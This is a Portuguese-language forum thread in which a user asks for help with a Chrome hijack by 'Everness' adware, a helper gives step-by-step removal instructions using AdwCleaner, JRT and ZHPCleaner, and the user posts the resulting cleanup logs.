• Comunicados

    • diego_moicano

      Gostaria de se tornar um analista em Remoção de Malware?   07-12-2015

      Gostaria de se tornar um analista em Remoção de Malware? O Fórum Clube do Hardware deu início a um programa de treinamento em análises de log. Os interessados deverão enviar um email para aprendizes (arroba) clubedohardware (ponto) com (ponto) br respondendo as seguintes perguntas: Por que você gostaria de aprender a analisar logs? Possui tempo hábil para o treinamento? Tem conhecimentos em informática? Se sim descreva-os. Possui inglês para leitura? Qual seu objetivo após completar o treinamento?   Não se esqueça de incluir no e-mail o seu nome de usuário (fornecer o link também), idade e cidade onde vive. Adicione também qualquer experiência e/ou razão sobre o porquê você seria um bom Analista. É digno de nota que apenas os que forem selecionados receberão resposta por MP (Mensagem Pessoal), não existe um padrão na escolha dos futuros aprendizes, todos os e-mails serão lidos e serão analisados de forma imparcial, portanto não será permitido reclamações neste aspecto. O treinamento é dado no próprio fórum. Quando um aprendiz é selecionado ele é movido para um novo grupo, onde terá acesso a fóruns fechados para os demais usuários onde poderá dar inicio ao seu treinamento. Importante: A cada 30 dias os e-mails não selecionados serão apagados, portanto você pode enviar um novo e-mail após 1 mês, e-mails enviados antes serão desconsiderados.  
    • Gabriel Torres

      Seja um moderador do Clube do Hardware!   12-02-2016

      Prezados membros do Clube do Hardware, Está aberto o processo de seleção de novos moderadores para diversos setores ou áreas do Clube do Hardware. Os requisitos são:   Pelo menos 500 posts e um ano de cadastro; Boa frequência de participação; Ser respeitoso, cordial e educado com os demais membros; Ter bom nível de português; Ter razoável conhecimento da área em que pretende atuar; Saber trabalhar em equipe (com os moderadores, coordenadores e administradores).   Os interessados deverão enviar uma mensagem privada para o usuário @Equipe Clube do Hardware com o título "Candidato a moderador". A mensagem deverá conter respostas às perguntas abaixo:   Qual o seu nome completo? Qual sua data de nascimento? Qual sua formação/profissão? Já atuou como moderador em algo outro fórum, se sim, qual? De forma sucinta, explique o porquê de querer ser moderador do fórum e conte-nos um pouco sobre você.   OBS: Não se trata de função remunerada. Todos que fazem parte do staff são voluntários.
Thiago Anjin

"Intruso" Everness modificando Google Chrome

10 posts neste tópico

Olá!

 

Há cerca de uma semana notei um comportamento estranho no meu notebook. Cada vez que tentava abrir o navegador, ele fechava abruptamente, até que, após aviso de "google chrome has crashed", o navegador reabriu. Atentei ao fato de o navegador não estar mais logado na minha conta Google, como de hábito, e também o fato de a página inicial ter mudado. Já estava bem suspeito. Ao tentar abrir o netflix, o servidor do site acusava que não havia um componente essencial para reprodução de vídeos. Fui atrás das causas possíveis (afinal um dia antes eu assistia netflix normalmente), e uma das causas que a ajuda do google sugeria era o Chrome não estar instalado. Ai minhas suspeitas estavam com bastante fatos baseados. Alguma coisa havia modificado ou removido o google.

 

Olhei o atalho do google e percebi que ele apontava para o caminho ""C:\Program Files (x86)\Everness\Application\chrome.exe"

 

Outro fato curioso: após dar a mensagem de erro no chrome, e abrir um Chrome 'modificado', surgiu na minha barra de tarefas um ícone do Firefox, também com página inicial modificada. Eu não instalei Firefox no meu notebook.

 

Após o ocorrido, tentei instalar antivírus (Avast) e removi o chrome modificado, e reinstalei o Chrome do site do google.

 

Ontem toda a descrição acima voltou a ocorrer. 

 

Segue o log ZA-Scan em anexo.

 


Grato desde já aos amigos pela ajuda!

 

Thiago.

 

ZA-Scan.txt

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro @Thiago Anjin

 

Recomendo que salve este tópico em seus Favoritos para facilitar na hora de encontrá-lo.

 

Por favor, atente para o seguinte:

  • Caso fique sem resposta durante 3 dias, me envie uma Mensagem Privada (MP);
  • O que será passado aqui, somente será com relação ao problema do seu computador portanto, não faça mais em nenhum outro;
  • Siga, por favor, atentamente as instruções passadas e em caso de dúvidas não hesite em perguntá-las;
  • Sempre coloque suas respostas neste tópico... Não abra outro!
  • Procure sempre me manter informado, durante a remoção, sobre o que acontece com seu computador.
  • Respeite a ordem das instruções passadas.

Observação: Não tome outra medida além das passadas aqui; atente para que, caso peça ajuda em outro fórum, não deixe de nos informar, sob risco de desconfigurar seu computador!

 

# Etapa nº 1 #
 
Baixe o AdwCleaner e salve em sua Área de trabalho (Desktop)

Execute o arquivo adwcleaner.exe

 

Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png 

  • Clique na aba Opções e deixe marcado apenas "Restaurar Políticas do IE" e "Restaurar Políticas do Chrome"
  • Clique no botão Verificar e aguarde o exame finalizar.
  • Clique no botão Limpar.
  • Abrirá um bloco de notas com o resultado.
  • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.
  • O log também será salvo em C:\AdwCleaner


NOTA: Se o AdwCleaner encontrar arquivos que não consiga remover, poderá ter de reiniciar o PC. Faça isso imediatamente, ao ser perguntado se quer reiniciar.
 
# Etapa nº 2 #
 
Desative temporariamente seu antivirus, antispywares e firewall, para não causar conflitos.

Baixe o Junkware Removal Tool (JRT) e salve em sua Área de trabalho (Desktop)

 

Clique duas vezes para executar o jrt.exe.
 

Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png 

  • A ferramenta começará o exame do seu sistema.
  • Tenha paciência pois pode demorar um pouco dependendo da quantidades de itens a examinar.
  • Ao final um log se abrirá. Será salvo no desktop com o nome de JRT.txt.
  • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

 
# Etapa nº 3 #
 
Desative temporariamente seu antivirus, antispywares e firewall, para não causar conflitos.

Faça o download do ZHPCleaner e salve em sua Área de trabalho (Desktop)

 

Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png

  • Clique no botão Scanner.
  • A ferramenta começara o exame do seu sistema.
  • Tenha paciência pois pode demorar um pouco dependendo da quantidades de itens a examinar.
  • Em seguida clique no botão Reparar.
  • Será gerado um log chamado ZHPCleaner.txt
  • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

#3   Postado (editado)

Olá, @diego_moicano!

 

Peço desculpas pela demora na verificação do post, mas por alguma razão não fui notificado pelo e-mail, como na outra vez, então vou ficar mais atento!

 

Vamos lá:

 

# Etapa nº 1 #

# AdwCleaner v6.046 - Relatório criado 12/05/2017 às 21:48:48
# Atualizado em 24/04/2017 por Malwarebytes
# Banco de dados : 2017-05-12.1 [Local]
# Sistema operacional : Windows 10 Home  (X64)
# Usuário : AnjiN - SEKIGAHARA
# Executando de : C:\Users\AnjiN\Desktop\adwcleaner_6.046.exe
# Modo: Limpo
# Apoio : https://www.malwarebytes.com/support



***** [ Serviços ] *****

[-] Serviço excluído:AppleCloudSvc


***** [ Pastas ] *****

[-] Pasta excluída:C:\ProgramData\19e753ae-340a-4f38-a35c-1682cb28aff0
[-] Pasta excluída:C:\ProgramData\250a46bf-d44c-4f80-9e0b-d4f3076b446e
[-] Pasta excluída:C:\ProgramData\28aeb0ec-e73e-48ef-b8b5-800001d72cc9
[-] Pasta excluída:C:\ProgramData\31a04406-e137-42f8-8acb-fa66ff5898aa
[-] Pasta excluída:C:\ProgramData\5a36d4b1-2a89-4902-8024-cb31b5b7d658
[-] Pasta excluída:C:\ProgramData\7445f030-c4fc-46d3-aad4-6523647a8818
[-] Pasta excluída:C:\ProgramData\7dd305aa-b8f6-49c1-bc30-402bf34a7cb6
[-] Pasta excluída:C:\ProgramData\7f503aa4-d3a9-4a56-a7c3-56ee8da0c72e
[-] Pasta excluída:C:\ProgramData\84833fe0-c667-4adb-abdb-022b8e7856cd
[-] Pasta excluída:C:\ProgramData\a16f8e46-bc1b-4385-8f32-a057c9ebe580
[-] Pasta excluída:C:\ProgramData\da8ab457-c5ab-4b79-ad72-4f7b1edb4fc0
[-] Pasta excluída:C:\ProgramData\e6e27b23-7ab1-486c-a02e-789f47c4bd66
[-] Pasta excluída:C:\Users\AnjiN\AppData\Local\Everbean
[-] Pasta excluída:C:\Users\AnjiN\AppData\Local\Everness
[#] Pasta excluída na reinicialização:C:\Users\AnjiN\AppData\Roaming\Elex-tech
[#] Pasta excluída na reinicialização:C:\Program Files (x86)\Elex-tech
[-] Pasta excluída:C:\Program Files (x86)\Everness
[#] Pasta excluída na reinicialização:C:\Program Files (x86)\Firefox
[-] Pasta excluída:C:\Users\AnjiN\AppData\Roaming\Firefox
[-] Pasta excluída:C:\Users\AnjiN\AppData\Local\Firefox


***** [ Arquivos ] *****

[-] Arquivo excluído:C:\Users\AnjiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\ScreenShot.lnk
[-] Arquivo excluído:C:\Windows\SysNative\log\iSafeKrnlCall.log
[-] Arquivo excluído:C:\Windows\SysNative\drivers\iSafeKrnlBoot.sys
[-] Arquivo excluído:C:\Windows\SysNative\drivers\iSafeNetFilter.sys
[-] Arquivo excluído:C:\ProgramData\Microsoft\Windows\Start Menu\ScreenShot.lnk
[-] Arquivo excluído:C:\Users\Public\Documents\temp.dat
[-] Arquivo excluído:C:\Users\Public\Documents\report.dat


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Atalhos ] *****



***** [ Atividades agendadas ] *****



***** [ Registro ] *****

[-] Chave excluída:HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnl
[#] Chave excluída na reinicialização:HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnlMon
[-] Chave excluída:HKLM\SYSTEM\CurrentControlSet\services\iSafeService
[-] Chave excluída:HKLM\SYSTEM\CurrentControlSet\services\isafekrnl
[#] Chave excluída na reinicialização:HKLM\SYSTEM\CurrentControlSet\services\isafekrnlmon
[-] Chave excluída:HKLM\SYSTEM\CurrentControlSet\services\isafeservice
[-] Chave excluída:HKU\S-1-5-21-1706358801-989810220-3475375959-1001\Software\Conduit
[-] Chave excluída:HKU\S-1-5-21-1706358801-989810220-3475375959-1001\Software\PRODUCTSETUP
[-] Chave excluída:HKU\S-1-5-21-1706358801-989810220-3475375959-1001\Software\csastats
[#] Chave excluída na reinicialização:HKCU\Software\Conduit
[#] Chave excluída na reinicialização:HKCU\Software\PRODUCTSETUP
[#] Chave excluída na reinicialização:HKCU\Software\csastats
[-] Chave excluída:HKLM\SOFTWARE\Conduit
[-] Chave excluída:HKLM\SOFTWARE\Elex-tech
[-] Chave excluída:HKLM\SOFTWARE\ScreenShot
[-] Chave excluída:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
[-] Chave excluída:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ScreenShot
[#] Chave excluída na reinicialização:[x64] HKCU\Software\Conduit
[#] Chave excluída na reinicialização:[x64] HKCU\Software\PRODUCTSETUP
[#] Chave excluída na reinicialização:[x64] HKCU\Software\csastats
[-] Chave excluída:HKCU\SOFTWARE\Classes\ChromeHTML
[-] Chave excluída:HKCU\SOFTWARE\Clients\StartMenuInternet\ChromeHTML


***** [ Verificando navegadores ... ] *****

[-] [C:\Users\AnjiN\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Eliminado:br.ask.com


*************************

:: Políticas do IE excluídas
:: Políticas do Chrome excluídas

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [4445 Bytes] - [12/05/2017 21:48:48]
C:\AdwCleaner\AdwCleaner[S0].txt - [4527 Bytes] - [12/05/2017 21:27:45]
C:\AdwCleaner\AdwCleaner[S1].txt - [4426 Bytes] - [12/05/2017 21:30:26]
C:\AdwCleaner\AdwCleaner[S2].txt - [4327 Bytes] - [12/05/2017 21:39:02]
C:\AdwCleaner\AdwCleaner[S3].txt - [4400 Bytes] - [12/05/2017 21:40:44]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [4810 Bytes] ##########

 

# Etapa nº 2 #

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.3 (04.10.2017)
Operating System: Windows 10 Home x64 
Ran by AnjiN (Administrator) on 12/05/2017 at 21:55:21,22
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 2 

Failed to delete: C:\Program Files (x86)\elex-tech (Folder) 
Successfully deleted: C:\Users\AnjiN\AppData\Roaming\elex-tech (Folder) 



Registry: 1 

Successfully deleted: HKLM\SYSTEM\CurrentControlSet\services\iSafeKrnl (Registry Key) 




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 12/05/2017 at 22:14:27,94
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

 

# Etapa nº 3 #

~ ZHPCleaner v2017.5.12.80 by Nicolas Coolman (2017/05/12)
~ Run by AnjiN (Administrator)  (12/05/2017 22:31:13)
~ Web: https://www.nicolascoolman.com
~ Blog: https://nicolascoolman.eu/
~ Facebook : https://www.facebook.com/nicolascoolman1
~ State version : Version KO
~ Type : Reparo
~ Report : C:\Users\AnjiN\Desktop\ZHPCleaner.txt
~ Quarantine : C:\Users\AnjiN\AppData\Roaming\ZHP\ZHPCleaner_Reg.txt
~ UAC : Activate
~ Boot Mode : Normal (Normal boot)
Windows 10 Home, 64-bit  (Build 14393)


---\\  Serviços (0)


---\\  Navegadores de Internet (0)
~ Nenhum ítem malicioso o desnecessários foi encontrado.


---\\  Arquivo hosts (1)
~ O arquivo hosts é legítimo (21)


---\\  Tarefas automáticas agendadas. (0)
~ Nenhum ítem malicioso o desnecessários foi encontrado.


---\\  Explorer ( Arquivos, Pastas) (118)
MOVIDO pasta: C:\Windows\Installer\wix{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}.SchedServiceConfig.rmi    =>.Superfluous.Empty
MOVIDO pasta: C:\Windows\Installer\wix{75FE588B-F158-4BB3-A283-A8D18E522A52}.SchedServiceConfig.rmi    =>.Superfluous.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\1fb8f7ad3e10install.rdf    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\4330eee4acf5install.rdf    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\ArmUI.ini    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\atcMRUList.idx    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\atc_DownloadsBackupMain.lst    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\badext.txt    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\CustomerSupport.JSON    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\databases.txt    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\DeleteOnReboot.bat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\deployment.xml    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\driver.xml    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\iex64.reg    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\lilo26216    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\lilo36216    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\lilo46216    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\LocalStorage.txt    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\Microsoft .NET Framework 4 Setup_20170306_162652349.html    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\Microsoft .NET Framework 4.5.2 Setup_20170216_162422554.html    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\Microsoft Visual C++ 2010  x64 Redistributable Setup_20170216_165330105.html    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\Microsoft Visual C++ 2010  x86 Redistributable Setup_20170216_165219113.html    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\PCW8E49.xml    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\Pocket Calculator.ttf    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\result.xml    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.00D57B0F-01FA-B79F-08D6-878ED20C4C9B_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.0116DC02-781B-D1D1-FC1C-C80195511E17_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.0862A72D-A96C-83E5-AD0F-78B6AA06F9C6_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.0C8CF327-9D17-CCDE-18AF-DFF4F20070E5_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.18DDC675-D472-0DB4-9563-7DF7C34F512C_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.1FE89C0B-9BED-CC5D-7426-9E4025D6BDD9_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.3BFD26C9-8DA9-B940-F638-55890012AAB4_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.50611331-FE19-D366-B049-694B8AC9D758_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.557EA3BB-623E-ADD9-4DFB-629A8648A038_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.558F5D32-0827-EB7B-6AD6-D5DB4138B3AA_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.62B49C0A-499E-A02D-EBCB-EB168E148E52_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.664AA17A-2D25-0823-3315-3708FE16147A_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.674C4C14-7BAA-F782-E214-956DC3BEDF39_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.68BC3251-2D8B-A604-92BA-893638CA72EA_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.68E019EB-0B92-5E08-5D86-9BFE6DBA8517_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.69F3BCAB-8975-C526-30F5-39FA70C77AD9_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.6D151227-6BD9-726D-B30E-A8A018DCC82B_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.6EA6FC2E-9305-586B-3411-02826D151533_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.97612282-D1E8-1D6A-9E92-C271E7F177EF_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9D4DED89-CABC-F4FB-8133-BC5EDB1C7EDA_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9NBLGGH1ZRPV_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9NBLGGH1ZRPV_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9NBLGGH2JHXJ_0_0011_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9NBLGGH2JHXJ_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFHVFW_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFHVFW_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFHW53_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFHW53_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ140_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ140_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ2WL_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ2WL_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ3TJ_0_0010_.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.9WZDNCRFJ3TJ_0__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.A90B8400-D36D-8235-8BF2-A21A53D3FB65_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.AD2F1837.HPPrinterControl_v10z8vjag6ke6_1__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.DFBE09D0-1F22-A9C0-2D3D-3F4C6351E58F_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.E336BB8F-16ED-7CBE-AFEE-971DD3041585_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.E6658C19-4221-2EBE-763A-F0493FBA2BB0_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.E6D3B497-80AF-7F14-F9E6-9606EE369FC3_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.FACF9DDE-1FF1-B57D-4D1D-CE479FDD42AF_5__.Public.AppUpdate.dat    =>.Superfluous.Temporary
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\sa.Microsoft.XboxOneSmartGlass_8wekyb3d8bbwe_1__.Public.InstallAgent.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\switchtempartwork.jpg    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\tmp-fab.xpi    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\wct689.tmp    =>.Superfluous.Temporary.Various
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\web_connector_args_9328.txt    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{00E5C764-9525-44C3-8404-712AD06AE12A}background.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{0CB57D21-5E7C-4121-AD75-8ED4AE1B31C8}CS3_ribs_mastercollection.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{11439DFB-0658-42C7-926D-B66985857733}background.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{193F8A7B-1853-48D5-88AC-19446C2C1D13}estk_ribs_bgd.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{24D77A7C-E10B-4057-9974-FAB8BFDAC853}background.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{30C4B843-28DA-466F-AFCA-CB0ED153C826}background.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{3BC8460B-085E-47F3-9C62-8FFCBAF11D78}background.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{450CDEDE-2E5F-4659-AC0D-BA693424ACAF}background.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{49AB8F8D-74E1-41E3-8310-9C99C1C6C86D} - OProcSessId.dat    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{4D950C75-E85F-4A5F-94CE-2C99FE56063F}.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{4DAFF26A-62E5-4F2F-9E98-E73B914E6828}pr_ribs_bgd.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{5CF8D367-0897-4AE2-B872-8543DAC17F0D}ae_ribs_bgd.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{7BB7F66A-D798-45A3-A383-0727FB1EBF8E}background.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{7E3A1BF6-0A77-41B0-9CAC-ABD550F6F10D}application.sif    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{7E3A1BF6-0A77-41B0-9CAC-ABD550F6F10D}en_ribs_bgd.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{81178416-8292-46D1-953F-483DE5A9A68A}pr_ribs_bgd.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{9787B2D4-5394-4525-A290-47653B3181D9}background.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{AC76BA86-1033-0000-7760-000000000003}.ini    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{B2021C08-9CA3-4873-BBB9-B3904524CDFC}.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{BB996BAA-72E6-48AF-899A-57B760CC3E21}application.sif    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{BB996BAA-72E6-48AF-899A-57B760CC3E21}pr_ribs_bgd.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{C4519961-AC64-4565-B3AF-9050296B5D5A}ai_ribs_bgd.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{C540712E-34FC-476B-AB3F-972B5792E37C}en_ribs_bgd.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{CBA9F6F8-071E-4587-9852-AC008CE62FB1}sb_ribs_bgd.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{D5058BB1-750B-49A1-B023-1AEBAC0C5636}application.sif    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{D5058BB1-750B-49A1-B023-1AEBAC0C5636}sb_ribs_bgd.png    =>.Superfluous.Temporary.Empty
MOVIDO pasta: C:\Users\AnjiN\AppData\Local\Temp\{D5C8E951-80C1-458C-8809-C6BDBE8772C0}.png    =>.Superfluous.Temporary.Empty
